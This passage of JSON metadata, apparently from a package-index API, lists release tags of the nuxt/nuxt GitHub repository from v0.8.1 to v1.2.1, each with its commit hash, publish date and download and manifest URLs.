","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nux